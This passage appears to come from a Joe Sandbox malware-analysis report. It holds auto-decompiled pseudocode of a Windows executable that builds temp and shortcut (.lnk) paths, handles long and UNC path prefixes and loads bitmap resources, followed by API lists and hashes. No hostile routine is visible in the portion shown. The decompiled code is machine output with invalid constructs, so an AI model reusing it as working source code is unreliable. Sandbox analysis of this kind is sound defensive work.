                                                    										__ebp - 0x2844 = E00CCB690(__eflags, __ebp - 0x2844, __esi);
                                                    										__eflags =  *((short*)(__ebp - 0x17894));
                                                    										if(__eflags != 0) {
                                                    											__ebp - 0x17894 = __ebp - 0x2844;
                                                    											E00CD05DA(__eflags, __ebp - 0x2844, __ebp - 0x17894, __esi) = __ebp - 0x2844;
                                                    											__eax = E00CCB690(__eflags, __ebp - 0x2844, __esi);
                                                    										}
                                                    										__ebp - 0x2844 = __ebp - 0xc894;
                                                    										__eax = E00CD0602(__ebp - 0xc894, __ebp - 0x2844, __esi);
                                                    										__eflags =  *(__ebp - 0x13894);
                                                    										__eax = __ebp - 0x13894;
                                                    										if(__eflags == 0) {
                                                    											__eax = __ebp - 0x19894;
                                                    										}
                                                    										__ebp - 0x2844 = E00CD05DA(__eflags, __ebp - 0x2844, __ebp - 0x2844, __esi);
                                                    										__eax = __ebp - 0x2844;
                                                    										__eflags = E00CCB92D(__ebp - 0x2844);
                                                    										if(__eflags == 0) {
                                                    											L170:
                                                    											__ebp - 0x2844 = E00CD05DA(__eflags, __ebp - 0x2844, L".lnk", __esi);
                                                    											goto L171;
                                                    										} else {
                                                    											L169:
                                                    											__eflags = __eax;
                                                    											if(__eflags == 0) {
                                                    												L171:
                                                    												__ebx = 0;
                                                    												__ebp - 0x2844 = E00CCA0B1(0, __ecx, __edi, __ebp, __ebp - 0x2844, 1, 0);
                                                    												__ebp - 0xb894 = __ebp - 0xa894;
                                                    												E00CD0602(__ebp - 0xa894, __ebp - 0xb894, __esi) = __ebp - 0xa894;
                                                    												__eax = E00CCC2E4(__eflags, __ebp - 0xa894);
                                                    												__esi =  *(__ebp - 0x1844) & 0x0000ffff;
                                                    												__eax = __ebp - 0x1844;
                                                    												__edx =  *(__ebp - 0x9894) & 0x0000ffff;
                                                    												__edi = __ebp - 0xa894;
                                                    												__ecx =  *(__ebp - 0x15894) & 0x0000ffff;
                                                    												__esi =  ~( *(__ebp - 0x1844) & 0x0000ffff);
                                                    												asm("sbb esi, esi");
                                                    												__esi =  ~( *(__ebp - 0x1844) & 0x0000ffff) & __ebp - 0x00001844;
                                                    												__edx =  ~( *(__ebp - 0x9894) & 0x0000ffff);
                                                    												__eax = __ebp - 0x9894;
                                                    												asm("sbb edx, edx");
                                                    												__edx =  ~( *(__ebp - 0x9894) & 0x0000ffff) & __ebp - 0x00009894;
                                                    												__ecx =  ~( *(__ebp - 0x15894) & 0x0000ffff);
                                                    												__eax = __ebp - 0x15894;
                                                    												asm("sbb ecx, ecx");
                                                    												__ecx =  ~( *(__ebp - 0x15894) & 0x0000ffff) & __ebp - 0x00015894;
                                                    												 *(__ebp - 0xa894) & 0x0000ffff =  ~( *(__ebp - 0xa894) & 0x0000ffff);
                                                    												asm("sbb eax, eax");
                                                    												 ~( *(__ebp - 0xa894) & 0x0000ffff) & __edi = __ebp - 0x2844;
                                                    												__ebp - 0xb894 = E00CDA48A( ~( *(__ebp - 0x15894) & 0x0000ffff) & __ebp - 0x00015894, 0, __ebp - 0xb894, __ebp - 0x2844,  ~( *(__ebp - 0xa894) & 0x0000ffff) & __edi, __ecx,  ~( *(__ebp - 0x9894) & 0x0000ffff) & __ebp - 0x00009894, __esi);
                                                    												__eflags =  *(__ebp - 0xc894) - __bx;
                                                    												if( *(__ebp - 0xc894) != __bx) {
                                                    													_push(0);
                                                    													__eax = __ebp - 0xc894;
                                                    													_push(__ebp - 0xc894);
                                                    													_push(5);
                                                    													_push(0x1000);
                                                    													__eax =  *0xd2308c();
                                                    												}
                                                    												goto L175;
                                                    											}
                                                    											goto L170;
                                                    										}
                                                    									}
                                                    								case 0xa:
                                                    									L173:
                                                    									__eflags = __ebx - 7;
                                                    									if(__ebx == 7) {
                                                    										 *0xd0a470 = 1;
                                                    									}
                                                    									goto L175;
                                                    								case 0xb:
                                                    									L81:
                                                    									__eax =  *(__ebp - 0x588c) & 0x0000ffff;
                                                    									__eax = E00CE79E9( *(__ebp - 0x588c) & 0x0000ffff);
                                                    									__eflags = __eax - 0x46;
                                                    									if(__eax == 0x46) {
                                                    										 *0xd08461 = 1;
                                                    									} else {
                                                    										__eflags = __eax - 0x55;
                                                    										if(__eax == 0x55) {
                                                    											 *0xd08462 = 1;
                                                    										} else {
                                                    											__eax = 0;
                                                    											 *0xd08461 = __al;
                                                    											 *0xd08462 = __al;
                                                    										}
                                                    									}
                                                    									goto L175;
                                                    								case 0xc:
                                                    									L104:
                                                    									 *0xd17b7a = 1;
                                                    									__eax = __eax + 0xd17b7a;
                                                    									_t117 = __esi + 0x39;
                                                    									 *_t117 =  *(__esi + 0x39) + __esp;
                                                    									__eflags =  *_t117;
                                                    									__ebp = 0xffffa774;
                                                    									if( *_t117 != 0) {
                                                    										_t119 = __ebp - 0x588c; // 0xffff4ee8
                                                    										__eax = _t119;
                                                    										 *0xcfe728 = E00CD1FA7(_t119);
                                                    									}
                                                    									goto L175;
                                                    							}
                                                    							L2:
                                                    							_push(0x1000);
                                                    							_push(_t294);
                                                    							_push(_t226);
                                                    							_t226 = E00CDAF98();
                                                    							_t294 = _t294 + 0x2000;
                                                    							_t292 = _t292 - 1;
                                                    							if(_t292 != 0) {
                                                    								goto L2;
                                                    							} else {
                                                    								_t295 = _t292;
                                                    								goto L4;
                                                    							}
                                                    						}
                                                    						L176:
                                                    						 *[fs:0x0] =  *((intOrPtr*)(_t299 - 0xc));
                                                    						return _t225;
                                                    					}
                                                    					L111:
                                                    					__eflags =  *0xd0c575 - __bl;
                                                    					if( *0xd0c575 != __bl) {
                                                    						goto L175;
                                                    					}
                                                    					L112:
                                                    					__eax = 0;
                                                    					 *(__ebp - 0x444) = __ax;
                                                    					__eax = __ebp - 0x588c;
                                                    					_push(__ebp - 0x588c);
                                                    					__eax = E00CE22C6(__ecx);
                                                    					_pop(__ecx);
                                                    					__ecx = 0x2c;
                                                    					__eflags = __eax;
                                                    					if(__eax != 0) {
                                                    						L119:
                                                    						__eflags =  *(__ebp - 0x444) - __bx;
                                                    						if( *(__ebp - 0x444) == __bx) {
                                                    							__ebp - 0x1b894 = __ebp - 0x588c;
                                                    							E00CD0602(__ebp - 0x588c, __ebp - 0x1b894, 0x1000) = __ebp - 0x19894;
                                                    							__ebp - 0x444 = E00CD0602(__ebp - 0x444, __ebp - 0x19894, 0x200);
                                                    						}
                                                    						__ebp - 0x588c = E00CDADD2(__ebp - 0x588c);
                                                    						__eax = 0;
                                                    						 *(__ebp - 0x488c) = __ax;
                                                    						__ebp - 0x444 = __ebp - 0x588c;
                                                    						__eax = E00CDA7E4( *(__ebp + 8), __ebp - 0x588c, __ebp - 0x444, 0x24);
                                                    						__eflags = __eax - 6;
                                                    						if(__eax != 6) {
                                                    							__eax = 0;
                                                    							 *0xd08454 = 1;
                                                    							 *0xd0946a = __ax;
                                                    							__eax = EndDialog( *(__ebp + 8), 1);
                                                    						}
                                                    						goto L175;
                                                    					}
                                                    					L113:
                                                    					__ax =  *(__ebp - 0x588c);
                                                    					__esi = __ebx;
                                                    					__eflags = __ax;
                                                    					if(__ax == 0) {
                                                    						goto L119;
                                                    					}
                                                    					L114:
                                                    					__ecx = __ax & 0x0000ffff;
                                                    					while(1) {
                                                    						L115:
                                                    						__eflags = __cx - 0x40;
                                                    						if(__cx == 0x40) {
                                                    							break;
                                                    						}
                                                    						L116:
                                                    						__eax =  *(__ebp + __esi * 2 - 0x588a) & 0x0000ffff;
                                                    						__esi =  &(__esi->i);
                                                    						__ecx = __eax;
                                                    						__eflags = __ax;
                                                    						if(__ax != 0) {
                                                    							continue;
                                                    						}
                                                    						L117:
                                                    						goto L119;
                                                    					}
                                                    					L118:
                                                    					__ebp - 0x588a = __ebp - 0x588a + __esi * 2;
                                                    					__ebp - 0x444 = E00CD0602(__ebp - 0x444, __ebp - 0x444, 0x200);
                                                    					__eax = 0;
                                                    					__eflags = 0;
                                                    					 *(__ebp + __esi * 2 - 0x588c) = __ax;
                                                    					goto L119;
                                                    					L123:
                                                    					__eflags = __ebx - 7;
                                                    					if(__ebx == 7) {
                                                    						__eflags =  *0xd0a46c - 0x800;
                                                    						if( *0xd0a46c == 0x800) {
                                                    							 *0xd0a46c = 2;
                                                    						}
                                                    						 *0xd09468 = 1;
                                                    					}
                                                    					goto L175;
                                                    				}
                                                    			}









                                                    0x00cdc869
                                                    0x00cdc90f
                                                    0x00cdc916
                                                    0x00cdc91c
                                                    0x00cdc91f
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdc921
                                                    0x00cdc928
                                                    0x00cdc92e
                                                    0x00cdc930
                                                    0x00000000
                                                    0x00cdc932
                                                    0x00cdc932
                                                    0x00cdc934
                                                    0x00cdc935
                                                    0x00cdc939
                                                    0x00cdc94d
                                                    0x00cdc952
                                                    0x00cdc95c
                                                    0x00cdc962
                                                    0x00cdc965
                                                    0x00cdc937
                                                    0x00cdc937
                                                    0x00cdc938
                                                    0x00000000
                                                    0x00cdc967
                                                    0x00cdc975
                                                    0x00cdc97b
                                                    0x00cdc97d
                                                    0x00cdc989
                                                    0x00cdc989
                                                    0x00000000
                                                    0x00cdc97d
                                                    0x00cdc965
                                                    0x00cdc930
                                                    0x00cdc86f
                                                    0x00cdc87e
                                                    0x00cdc88b
                                                    0x00cdc89c
                                                    0x00cdc89f
                                                    0x00cdc8a2
                                                    0x00cdc8b5
                                                    0x00cdc8bc
                                                    0x00cdc8c1
                                                    0x00cdc8c3
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdc8c9
                                                    0x00cdc8d0
                                                    0x00cdc8d5
                                                    0x00cdc8da
                                                    0x00cdc8e6
                                                    0x00cdc8eb
                                                    0x00cdc8ee
                                                    0x00cdc8f5
                                                    0x00cdc8f7
                                                    0x00cdc8f8
                                                    0x00cdc902
                                                    0x00cdc908
                                                    0x00cdc909
                                                    0x00000000
                                                    0x00cdc909
                                                    0x00cdc8a4
                                                    0x00cdc8ab
                                                    0x00cdc8b1
                                                    0x00cdc8b3
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdc8b3
                                                    0x00cdc9aa
                                                    0x00cdc9aa
                                                    0x00cdc9b4
                                                    0x00cdc9b4
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdc9be
                                                    0x00cdc9be
                                                    0x00cdc9c0
                                                    0x00000000
                                                    0x00cdc9c6
                                                    0x00cdc9c6
                                                    0x00cdc9cb
                                                    0x00cdc9cd
                                                    0x00cdc9d0
                                                    0x00cdc9d2
                                                    0x00cdc9df
                                                    0x00cdc9e4
                                                    0x00cdc9e5
                                                    0x00cdc9e5
                                                    0x00cdc9e6
                                                    0x00cdc9e9
                                                    0x00cdc9eb
                                                    0x00cdc9f5
                                                    0x00cdc9f8
                                                    0x00cdc9fe
                                                    0x00cdca00
                                                    0x00cdc9ed
                                                    0x00cdc9ed
                                                    0x00cdc9ed
                                                    0x00cdca05
                                                    0x00cdca07
                                                    0x00cdca10
                                                    0x00cdca10
                                                    0x00cdca12
                                                    0x00cdca13
                                                    0x00cdca18
                                                    0x00cdca21
                                                    0x00cdca22
                                                    0x00cdca28
                                                    0x00cdca2d
                                                    0x00cdca30
                                                    0x00cdca32
                                                    0x00cdca4b
                                                    0x00cdca4b
                                                    0x00cdca4d
                                                    0x00cdca54
                                                    0x00cdca59
                                                    0x00000000
                                                    0x00cdca4d
                                                    0x00cdca34
                                                    0x00cdca34
                                                    0x00cdca39
                                                    0x00cdca3b
                                                    0x00cdca3d
                                                    0x00cdca3d
                                                    0x00cdca3f
                                                    0x00cdca3f
                                                    0x00cdca42
                                                    0x00cdca44
                                                    0x00cdca49
                                                    0x00cdca4a
                                                    0x00000000
                                                    0x00cdca4a
                                                    0x00000000
                                                    0x00cdca5f
                                                    0x00cdca5f
                                                    0x00cdca61
                                                    0x00cdca71
                                                    0x00cdca71
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdca7c
                                                    0x00cdca7c
                                                    0x00cdca7e
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdca84
                                                    0x00cdca84
                                                    0x00cdca8b
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdca91
                                                    0x00cdca91
                                                    0x00cdca93
                                                    0x00cdca99
                                                    0x00cdca9b
                                                    0x00cdcaa2
                                                    0x00cdcaa3
                                                    0x00cdcaaa
                                                    0x00cdcaac
                                                    0x00cdcaac
                                                    0x00cdcab3
                                                    0x00cdcab8
                                                    0x00cdcabe
                                                    0x00cdcac0
                                                    0x00000000
                                                    0x00cdcac6
                                                    0x00cdcac6
                                                    0x00cdcac6
                                                    0x00cdcac9
                                                    0x00cdcacb
                                                    0x00cdcacc
                                                    0x00cdcacf
                                                    0x00cdcaf8
                                                    0x00cdcaf8
                                                    0x00cdcafb
                                                    0x00cdcbe0
                                                    0x00cdcbe9
                                                    0x00cdcbee
                                                    0x00cdcbee
                                                    0x00cdcbf0
                                                    0x00cdcbf0
                                                    0x00cdcbf2
                                                    0x00cdcbf4
                                                    0x00cdcbfb
                                                    0x00cdcc00
                                                    0x00cdcc01
                                                    0x00cdcc02
                                                    0x00cdcc04
                                                    0x00cdcc06
                                                    0x00cdcc0a
                                                    0x00cdcc0c
                                                    0x00cdcc0c
                                                    0x00cdcc0e
                                                    0x00cdcc0e
                                                    0x00cdcc0a
                                                    0x00cdcc12
                                                    0x00cdcc18
                                                    0x00cdcc25
                                                    0x00cdcc2c
                                                    0x00cdcc3c
                                                    0x00cdcc46
                                                    0x00cdcc54
                                                    0x00cdcc5a
                                                    0x00cdcc62
                                                    0x00cdcc67
                                                    0x00cdcc68
                                                    0x00cdcc69
                                                    0x00cdcc6b
                                                    0x00cdcc7f
                                                    0x00cdcc7f
                                                    0x00000000
                                                    0x00cdcc6b
                                                    0x00cdcb01
                                                    0x00cdcb01
                                                    0x00cdcb04
                                                    0x00cdcb11
                                                    0x00cdcb11
                                                    0x00cdcb14
                                                    0x00cdcb16
                                                    0x00cdcb17
                                                    0x00cdcb19
                                                    0x00cdcb1a
                                                    0x00cdcb1f
                                                    0x00cdcb24
                                                    0x00cdcb2a
                                                    0x00cdcb2c
                                                    0x00cdcb2e
                                                    0x00cdcb31
                                                    0x00cdcb38
                                                    0x00cdcb39
                                                    0x00cdcb3f
                                                    0x00cdcb40
                                                    0x00cdcb43
                                                    0x00cdcb44
                                                    0x00cdcb45
                                                    0x00cdcb4a
                                                    0x00cdcb4d
                                                    0x00cdcb53
                                                    0x00cdcb5c
                                                    0x00cdcb5f
                                                    0x00cdcb64
                                                    0x00cdcb66
                                                    0x00cdcb68
                                                    0x00cdcb6a
                                                    0x00cdcb6a
                                                    0x00cdcb6c
                                                    0x00cdcb6c
                                                    0x00cdcb6e
                                                    0x00cdcb6e
                                                    0x00cdcb76
                                                    0x00cdcb7d
                                                    0x00cdcb7f
                                                    0x00cdcb86
                                                    0x00cdcb8c
                                                    0x00cdcb8e
                                                    0x00cdcb8f
                                                    0x00cdcb97
                                                    0x00cdcba6
                                                    0x00cdcba6
                                                    0x00cdcb97
                                                    0x00cdcbb1
                                                    0x00cdcbb3
                                                    0x00cdcbc2
                                                    0x00cdcbc8
                                                    0x00cdcbce
                                                    0x00cdcbd9
                                                    0x00cdcbd9
                                                    0x00000000
                                                    0x00cdcbce
                                                    0x00cdcb06
                                                    0x00cdcb06
                                                    0x00cdcb0b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcb0b
                                                    0x00cdcad1
                                                    0x00cdcad1
                                                    0x00cdcad5
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcad7
                                                    0x00cdcad7
                                                    0x00cdcada
                                                    0x00cdcadc
                                                    0x00cdcadf
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcae5
                                                    0x00cdcaee
                                                    0x00000000
                                                    0x00cdcaee
                                                    0x00000000
                                                    0x00cdcc8a
                                                    0x00cdcc8a
                                                    0x00cdcc8b
                                                    0x00cdcc90
                                                    0x00cdcc92
                                                    0x00cdcc95
                                                    0x00cdcc95
                                                    0x00000000
                                                    0x00cdcccb
                                                    0x00cdcccb
                                                    0x00cdccd2
                                                    0x00cdccd4
                                                    0x00cdccd4
                                                    0x00cdccd6
                                                    0x00cdcd05
                                                    0x00cdcd05
                                                    0x00cdcd0b
                                                    0x00000000
                                                    0x00cdcd0b
                                                    0x00cdccd8
                                                    0x00cdccd8
                                                    0x00cdccd8
                                                    0x00cdccdb
                                                    0x00cdccf4
                                                    0x00cdccf4
                                                    0x00cdccfa
                                                    0x00cdccfa
                                                    0x00000000
                                                    0x00cdccfa
                                                    0x00cdccdd
                                                    0x00cdccdd
                                                    0x00cdccdd
                                                    0x00cdcce0
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcce2
                                                    0x00cdcce2
                                                    0x00cdcce2
                                                    0x00cdcce5
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcceb
                                                    0x00cdcceb
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcd58
                                                    0x00cdcd58
                                                    0x00cdcd5a
                                                    0x00cdcd61
                                                    0x00cdcd62
                                                    0x00cdcd68
                                                    0x00cdcd70
                                                    0x00cdcd72
                                                    0x00cdcd75
                                                    0x00cdce25
                                                    0x00cdce25
                                                    0x00cdce29
                                                    0x00cdce38
                                                    0x00cdce38
                                                    0x00cdce3c
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdce42
                                                    0x00cdce42
                                                    0x00cdce45
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdce4b
                                                    0x00cdce4b
                                                    0x00cdce4b
                                                    0x00cdce4d
                                                    0x00cdce4e
                                                    0x00cdce4e
                                                    0x00cdce4f
                                                    0x00cdce50
                                                    0x00cdce53
                                                    0x00000000
                                                    0x00cdce53
                                                    0x00cdce2b
                                                    0x00cdce2b
                                                    0x00cdce2e
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdce34
                                                    0x00cdce34
                                                    0x00000000
                                                    0x00cdce34
                                                    0x00cdcd7b
                                                    0x00cdcd7b
                                                    0x00cdcd81
                                                    0x00cdcd83
                                                    0x00cdcd84
                                                    0x00cdcd89
                                                    0x00cdcd8a
                                                    0x00cdcd8b
                                                    0x00cdcd8d
                                                    0x00cdce22
                                                    0x00cdce22
                                                    0x00000000
                                                    0x00cdce22
                                                    0x00cdcd93
                                                    0x00cdcd93
                                                    0x00cdcd93
                                                    0x00cdcd96
                                                    0x00cdcd99
                                                    0x00cdcd9b
                                                    0x00cdcd9e
                                                    0x00cdcda4
                                                    0x00cdcda6
                                                    0x00cdcda7
                                                    0x00cdcdad
                                                    0x00cdcdae
                                                    0x00cdcdb3
                                                    0x00cdcdb6
                                                    0x00cdcdb8
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcdba
                                                    0x00cdcdba
                                                    0x00cdcdbc
                                                    0x00cdcdbc
                                                    0x00cdcdbc
                                                    0x00cdcdc4
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcdc6
                                                    0x00cdcdcb
                                                    0x00cdcdd2
                                                    0x00cdcdd7
                                                    0x00cdcdde
                                                    0x00cdcde0
                                                    0x00cdcde2
                                                    0x00cdcde9
                                                    0x00cdcdee
                                                    0x00cdcdf0
                                                    0x00cdcdf2
                                                    0x00cdcdf4
                                                    0x00cdcdf4
                                                    0x00cdcdfa
                                                    0x00cdce01
                                                    0x00cdce06
                                                    0x00cdce08
                                                    0x00cdce0a
                                                    0x00cdce0c
                                                    0x00cdce0c
                                                    0x00cdce0d
                                                    0x00cdce0f
                                                    0x00cdce15

                                                    APIs
                                                    • GetTempPathW.KERNEL32(00000800,?), ref: 00CDCE9D
                                                      • Part of subcall function 00CCB690: _wcslen.LIBCMT ref: 00CCB696
                                                    • _swprintf.LIBCMT ref: 00CDCED1
                                                      • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                    • SetDlgItemTextW.USER32(?,00000066,00D0946A), ref: 00CDCEF1
                                                    • EndDialog.USER32(?,00000001), ref: 00CDCFFE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                    • String ID: %s%s%u
                                                    • API String ID: 110358324-1360425832
                                                    • Opcode ID: 03e9515718f0bb8d37433a33627376e7694f2ccc35907e510e3b95b038f2ef4f
                                                    • Instruction ID: 807bd98755ab0ea970c7a80d8065f31d362af8fa9e2ceadbc015a0375dfc1671
                                                    • Opcode Fuzzy Hash: 03e9515718f0bb8d37433a33627376e7694f2ccc35907e510e3b95b038f2ef4f
                                                    • Instruction Fuzzy Hash: DE4183B5900259AADF259B90CC85FEE77BCEB04300F4080A7FA09E7251EE709A45DF72
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 81%
                                                    			E00CCBB03(signed short* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                    				short _v4096;
                                                    				short _v4100;
                                                    				void* _t32;
                                                    				long _t34;
                                                    				void* _t40;
                                                    				void* _t55;
                                                    				signed short* _t62;
                                                    				void* _t65;
                                                    				intOrPtr _t67;
                                                    				signed short* _t68;
                                                    				intOrPtr _t69;
                                                    
                                                    				E00CDEC50(0x1000);
                                                    				_t68 = _a4;
                                                    				_t70 =  *_t68;
                                                    				if( *_t68 == 0) {
                                                    					L21:
                                                    					__eflags = 0;
                                                    					return 0;
                                                    				}
                                                    				E00CCBC98(_t70, _t68);
                                                    				_t65 = E00CE3E13(_t68);
                                                    				_t32 = E00CCBCC3(_t68);
                                                    				_t71 = _t32;
                                                    				if(_t32 == 0) {
                                                    					_t34 = GetCurrentDirectoryW(0x7ff,  &_v4100);
                                                    					__eflags = _t34;
                                                    					if(_t34 == 0) {
                                                    						goto L21;
                                                    					}
                                                    					__eflags = _t34 - 0x7ff;
                                                    					if(_t34 > 0x7ff) {
                                                    						goto L21;
                                                    					}
                                                    					__eflags = E00CCBD9D( *_t68 & 0x0000ffff);
                                                    					if(__eflags == 0) {
                                                    						E00CCB690(__eflags,  &_v4100, 0x800);
                                                    						_t40 = E00CE3E13( &_v4100);
                                                    						_t67 = _a12;
                                                    						__eflags = _t67 - _t40 + _t65 + 4;
                                                    						if(_t67 <= _t40 + _t65 + 4) {
                                                    							goto L21;
                                                    						}
                                                    						E00CD0602(_a8, L"\\\\?\\", _t67);
                                                    						E00CD05DA(__eflags, _a8,  &_v4100, _t67);
                                                    						__eflags =  *_t68 - 0x2e;
                                                    						if(__eflags == 0) {
                                                    							__eflags = E00CCBD9D(_t68[1] & 0x0000ffff);
                                                    							if(__eflags != 0) {
                                                    								_t68 =  &(_t68[2]);
                                                    							}
                                                    						}
                                                    						L16:
                                                    						_push(_t67);
                                                    						L5:
                                                    						_push(_t68);
                                                    						L6:
                                                    						_push(_a8);
                                                    						E00CD05DA(_t73);
                                                    						return 1;
                                                    					}
                                                    					_t14 = _t65 + 6; // 0x6
                                                    					_t67 = _a12;
                                                    					__eflags = _t67 - _t14;
                                                    					if(_t67 <= _t14) {
                                                    						goto L21;
                                                    					}
                                                    					E00CD0602(_a8, L"\\\\?\\", _t67);
                                                    					__eflags = 0;
                                                    					_v4096 = 0;
                                                    					E00CD05DA(0, _a8,  &_v4100, _t67);
                                                    					goto L16;
                                                    				}
                                                    				if(E00CCBC98(_t71, _t68) == 0) {
                                                    					_t55 = 0x5c;
                                                    					__eflags =  *_t68 - _t55;
                                                    					if( *_t68 != _t55) {
                                                    						goto L21;
                                                    					}
                                                    					_t62 =  &(_t68[1]);
                                                    					__eflags =  *_t62 - _t55;
                                                    					if( *_t62 != _t55) {
                                                    						goto L21;
                                                    					}
                                                    					_t69 = _a12;
                                                    					_t10 = _t65 + 6; // 0x6
                                                    					__eflags = _t69 - _t10;
                                                    					if(_t69 <= _t10) {
                                                    						goto L21;
                                                    					}
                                                    					E00CD0602(_a8, L"\\\\?\\", _t69);
                                                    					E00CD05DA(__eflags, _a8, L"UNC", _t69);
                                                    					_push(_t69);
                                                    					_push(_t62);
                                                    					goto L6;
                                                    				}
                                                    				_t2 = _t65 + 4; // 0x4
                                                    				_t73 = _a12 - _t2;
                                                    				if(_a12 <= _t2) {
                                                    					goto L21;
                                                    				} else {
                                                    					E00CD0602(_a8, L"\\\\?\\", _a12);
                                                    					_push(_a12);
                                                    					goto L5;
                                                    				}
                                                    			}















                                                    APIs
                                                    • _wcslen.LIBCMT ref: 00CCBB27
                                                    • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00CCA275,?,?,00000800,?,00CCA23A,?,00CC755C), ref: 00CCBBC5
                                                    • _wcslen.LIBCMT ref: 00CCBC3B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$CurrentDirectory
                                                    • String ID: UNC$\\?\
                                                    • API String ID: 3341907918-253988292
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CDB6DD(void* __ecx, void* __edx, void* __fp0) {
                                                    				intOrPtr _v20;
                                                    				intOrPtr _v24;
                                                    				void _v28;
                                                    				void* _t13;
                                                    				void* _t15;
                                                    				signed int _t20;
                                                    				signed int _t21;
                                                    				void* _t23;
                                                    				void* _t24;
                                                    				void* _t28;
                                                    				void* _t35;
                                                    
                                                    				_t35 = __fp0;
                                                    				_t23 = __edx;
                                                    				_t24 = LoadBitmapW( *0xd01028, 0x65);
                                                    				_t21 = _t20 & 0xffffff00 | _t24 == 0x00000000;
                                                    				if(_t24 != 0) {
                                                    					L2:
                                                    					GetObjectW(_t24, 0x18,  &_v28);
                                                    					L4:
                                                    					if(E00CDA5C6(_t31) != 0) {
                                                    						if(_t21 != 0) {
                                                    							_t28 = E00CDA6C2(0x66);
                                                    							if(_t28 != 0) {
                                                    								DeleteObject(_t24);
                                                    								_t24 = _t28;
                                                    							}
                                                    						}
                                                    						_t13 = E00CDA605(_v20);
                                                    						_t15 = E00CDA80C(_t23, _t35, _t24, E00CDA5E4(_v24), _t13);
                                                    						DeleteObject(_t24);
                                                    						_t24 = _t15;
                                                    					}
                                                    					return _t24;
                                                    				}
                                                    				_t24 = E00CDA6C2(0x65);
                                                    				_t31 = _t24;
                                                    				if(_t24 == 0) {
                                                    					_v24 = 0x5d;
                                                    					_v20 = 0x12e;
                                                    					goto L4;
                                                    				}
                                                    				goto L2;
                                                    			}















                                                    APIs
                                                    • LoadBitmapW.USER32(00000065), ref: 00CDB6ED
                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00CDB712
                                                    • DeleteObject.GDI32(00000000), ref: 00CDB744
                                                    • DeleteObject.GDI32(00000000), ref: 00CDB767
                                                      • Part of subcall function 00CDA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00CDB73D,00000066), ref: 00CDA6D5
                                                      • Part of subcall function 00CDA6C2: SizeofResource.KERNEL32(00000000,?,?,?,00CDB73D,00000066), ref: 00CDA6EC
                                                      • Part of subcall function 00CDA6C2: LoadResource.KERNEL32(00000000,?,?,?,00CDB73D,00000066), ref: 00CDA703
                                                      • Part of subcall function 00CDA6C2: LockResource.KERNEL32(00000000,?,?,?,00CDB73D,00000066), ref: 00CDA712
                                                      • Part of subcall function 00CDA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00CDB73D,00000066), ref: 00CDA72D
                                                      • Part of subcall function 00CDA6C2: GlobalLock.KERNEL32 ref: 00CDA73E
                                                      • Part of subcall function 00CDA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00CDA7A7
                                                      • Part of subcall function 00CDA6C2: GlobalUnlock.KERNEL32(00000000), ref: 00CDA7C6
                                                      • Part of subcall function 00CDA6C2: GlobalFree.KERNEL32 ref: 00CDA7CD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
